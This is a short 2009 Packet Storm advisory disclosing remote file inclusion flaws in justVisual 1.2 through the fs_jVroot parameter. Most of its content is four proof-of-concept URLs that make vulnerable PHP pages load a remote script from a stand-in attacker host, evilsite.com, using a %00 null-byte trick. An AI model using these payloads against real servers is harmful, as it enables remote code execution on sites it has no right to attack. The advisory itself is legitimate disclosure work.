justVisual 1.2 Remote File Inclusion

2009-08-05T00:00:00
ID PACKETSTORM:79929
Type packetstorm
Reporter SirGod
Modified 2009-08-05T00:00:00

Description

                                        
                                            `##################################################################################################################  
[+] justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities  
[+] Discovered By SirGod  
[+] http://insecurity-ro.org  
[+] http://h4cky0u.org  
##################################################################################################################  
  
[+] Download : http://www.fh54.de/justVisual/justVisual_1.2.zip  
  
[+] Remote File Inclusion  
  
- Vulnerable code is everywhere  
  
- PoC's  
  
http://127.0.0.1/path/justVisual/sites/site/pages/index.php?fs_jVroot=http://evilsite.com/evilscript.txt%00  
  
http://127.0.0.1/path/justVisual/sites/test/pages/contact.php?fs_jVroot=http://evilsite.com/evilscript.txt%00  
  
http://127.0.0.1/path/justVisual/system/pageTemplate.php?fs_jVroot=http://evilsite.com/evilscript.txt%00  
  
http://127.0.0.1/path/justVisual/system/utilities.php?fs_jVroot=http://evilsite.com/evilscript.txt%00  
  
##################################################################################################################  
  
`